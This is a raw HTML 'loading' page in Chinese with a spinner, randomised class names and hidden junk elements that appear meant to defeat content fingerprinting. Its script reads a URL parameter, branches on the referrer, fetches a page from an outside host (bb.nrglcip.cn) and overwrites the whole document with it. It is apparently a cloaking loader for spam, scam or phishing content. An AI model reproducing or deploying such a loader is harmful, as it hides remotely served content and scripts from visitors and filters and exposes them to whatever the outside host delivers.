<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Rx4C9yMt8t {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Rx4C9yMt8t .l0q7Z3XWQF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Rx4C9yMt8t .content {
            line-height: 50px;
            text-align: center
        }

        .Rx4C9yMt8t .img {
            width: 100%
        }

        .Rx4C9yMt8t .YocXbfK {
            text-align: center
        }

        .Rx4C9yMt8t .YocXbfK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Rx4C9yMt8t .YocXbfK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Rx4C9yMt8t .YocXbfK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Rx4C9yMt8t .YocXbfK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Rx4C9yMt8t .YocXbfK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Rx4C9yMt8t .YocXbfK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Rx4C9yMt8t .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kPaAoRBUUU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZCm2hP = kPaAoRBUUU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZCm2hP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZCm2hP +".html?a=share";
		}
		
        nfmOLUswb=url+"#"+new Date().getTime();
        nfmOLUswb && function() {
            $.get(nfmOLUswb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >UT1ALCt9y5bXVahVhA</b>
<a  href='#' style='display:none'>BU302LCd59sVxnRmR3ARDbBvHdmTwy7gB5tF3dyMgaHZjc22nS</a>
<ul style='display:none' >G79jDaXr2GVY2x1MYxDmR9P6wKHAsMndp17uyefwBylvzcbKEp8weP8yN8ZtzZRFATc0nH3ydWE2rUlBox007GniswkPH</ul><div class="Rx4C9yMt8t">
    <div class="l0q7Z3XWQF">
        <div class="YocXbfK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>gMnqxQatoYg6KlkyRsVJLTz3eZ0</div>
<li style='display:none' >v1NW1mNOM3I3yYpUq72jsTxQorHCiQZ8owTWUqeboNWsdtYECqoEYNBKa76zk6LpoxayXR6GqJR1ssoktVs0Z2XzXiY1vAW9</li>
<h1 style='display:none' >Hetc9ynaPGyiu8oAfweYixs3R8lH5Zn6ixGq0P7x8UeI3NnUyIe92vJULmyD2mXdskdGaUs66YQxKMVyYuvOX</h1>
<b style='display:none' >HWMSyDpSl2i1yPRRViNK4Bgcp6xaEzpj9nJLJN3ip7FZTFuEr3gmjbYkMkMNZUIPpn4</b>
<b style='display:none' >HWMSyDpSl2i1yPRRViNK4Bgcp6xaEzpj9nJLJN3ip7FZTFuEr3gmjbYkMkMNZUIPpn4</b>
<a  href='#' style='display:none'>rArXX8TAFhi0MmjbP0Is4088jToMYa9cw1Js3kKf2U7YRThTmVqYO4aQ2MlRgXfzila74FVLmBeQQc1i45nr3VsQsULqCqsYu</a>
<p  style='display:none'>RH38lmu4mUTWxSQioJ5Fs7ITfnP8WTgDExeuhPHBAZR502vd3txc0TRdppnf88XU0WCd8AovUx1AistMSV</p>
<div style='display:none'>gMnqxQatoYg6KlkyRsVJLTz3eZ0</div>
<img  src='' style='display:none'></body>
</html>